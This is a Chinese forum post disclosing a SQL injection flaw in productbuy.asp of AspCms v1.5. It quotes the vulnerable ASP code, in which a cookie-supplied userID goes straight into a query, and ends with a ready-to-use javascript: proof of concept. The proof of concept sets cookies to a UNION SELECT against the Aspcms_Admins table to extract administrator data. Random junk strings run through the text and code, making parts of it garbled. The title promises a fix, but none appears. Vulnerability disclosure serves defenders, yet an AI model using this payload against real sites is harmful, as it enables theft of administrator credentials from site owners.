AspCms_v1.5_20110517 SQL注射漏洞及修复

admin

好久没上土司了，上来一看发现在删号名单内.....
3 D7 E2 ^& \; Y* {- t也没啥好发的，前些天路过某个小站，用的AspCms这个系统，搜索了下，productbuy.asp这个文件存在注射，但是目标已经修补....下载了代码，很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞，但是就在同一个文件下面找到了注射漏洞。。。。。。。
1 j7 Y! w3 f. [1 H; D2 Q废话不多说，看代码：

. T' @( g: c$ ?* ]2 C1 W<%

if action = "buy" then
/ D/ J8 G4 `& Q
* U( y  Q4 }: _% L3 d        addOrder()
2 Y, e; g4 [2 A7 k8 H$ B: Z7 o% |
9 b& a% |5 b8 R# u: j- ^else

        echoContent()

end if


0 b, }. U* H& w/ s
……略过

7 ?3 e1 u; m$ J/ D/ S3 J4 N/ E8 _

$ l; V* ^% h! Y6 ySub echoContent()

        dim id
& P- w! V- e% R. i# Y
        id=getForm("id","get")

, [8 [% h9 b: N+ }% \( N        
" D! N; Y- |% R0 h5 S  b7 i5 O* U
        if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品！","-1"
, t" ~3 y( {, c
        
- R8 B! L( u0 m; P5 _" b5 F4 l- P
        dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
- _$ l) q/ R- C
6 S6 T- m6 J/ j; Z4 @' M        dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct

- h2 C7 a8 g5 s        Dim templatePath,tempStr

. W# S# |6 {8 U9 T        templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
. ~' Z& `0 n  j; k* X9 }, O" |5 K  w8 n

9 I7 Q+ S6 D" p% Y8 l4 q& H: A8 d
5 ^( E, Y2 d& t+ D: H9 i: `        set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
3 o- h6 E5 ?& g- L) e' o6 i
        selectproduct=rsObj(0)
* Q! I$ s0 j% l) Q0 a' b
        
( ?: i, N' ?; j' _
! D) R- V, [' ?8 N3 F        Dim linkman,gender,phone,mobile,email,qq,address,postcode
0 J. s( O$ U$ t! F$ a
0 y# P0 t' t/ Y' G4 N4 Z        if isnul(rCookie("loginstatus")) then  wCookie"loginstatus",0

        if rCookie("loginstatus")=1 then  
; G3 X& ^; o  g
# c% S0 J2 o) I4 L                set rsObj=conn.Exec("select *  from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")

                linkman=rsObj("truename")
% P% U+ n( v; z
8 J+ X+ R+ M: E% q" h                gender=rsObj("gender")

                phone=rsObj("phone")
" M1 ^& x+ P* w! w
                mobile=rsObj("mobile")
7 v$ W: v5 f' _
                email=rsObj("email")

( B! o' ^; m# Y                qq=rsObj("qq")
2 B3 `) p0 F2 e, F0 Q( Q- G9 b
                address=rsObj("address")

                postcode=rsObj("postcode")

; ]6 N& F' F. @) I5 I3 p  _        else

' }0 W( N2 R1 U' d, I! m+ F                gender=1
# a3 w$ y% @: h4 F7 M& V
        end if

        rsObj.close()

               

* Y! A: ?+ U6 f. N0 W        with templateObj

# D9 A( `7 f$ B4 R# ~  R                .content=loadFile(templatePath)        
/ \4 J3 z  Q2 u9 E8 T2 W# g" D
& [7 B" _- J1 j                .parseHtml()

: K0 i8 u; I1 N! w* p( t( x0 b3 ]6 N                .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)

; ]$ U* S! p& c( e/ k+ x                .content=replaceStr(.content,"[aspcms:linkman]",linkman)               
# ]" i7 K; X, m1 [; U
                .content=replaceStr(.content,"[aspcms:gender]",gender)               
# ?& G5 p6 u$ ~+ F" }  @" C
3 M3 ?: B  {6 c0 ?" o+ ?/ F5 q% y                .content=replaceStr(.content,"[aspcms:phone]",phone)               

                .content=replaceStr(.content,"[aspcms:mobile]",mobile)               

                .content=replaceStr(.content,"[aspcms:email]",email)                        

                .content=replaceStr(.content,"[aspcms:qq]",qq)                        

5 g0 S; M  F( X' u7 q/ c                .content=replaceStr(.content,"[aspcms:address]",address)                        
, K1 G/ x) j3 O. v: Q
0 ?, d6 o3 ^3 e$ J- K- U$ n                .content=replaceStr(.content,"[aspcms:postcode]",postcode)        
9 B2 X  U8 p+ ?" E5 H: I% E3 ]: y
. M2 a3 J) C' p3 {                .parseCommon()                 

                echo .content
4 @6 R$ z, e2 K
- R; Z) X! @* Z# M        end with
5 T# k# ?, }+ p* g+ V
        set templateobj =nothing : terminateAllObjects

End Sub
1 L- P- ^3 ?2 f9 R9 [6 W( x漏洞很明显，没啥好说的
poc：

% s/ a* q. _7 }* d& ]9 Jjavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外，脚本板块没权限发帖子​

! K- X; Y" M2 l: U7 e6 u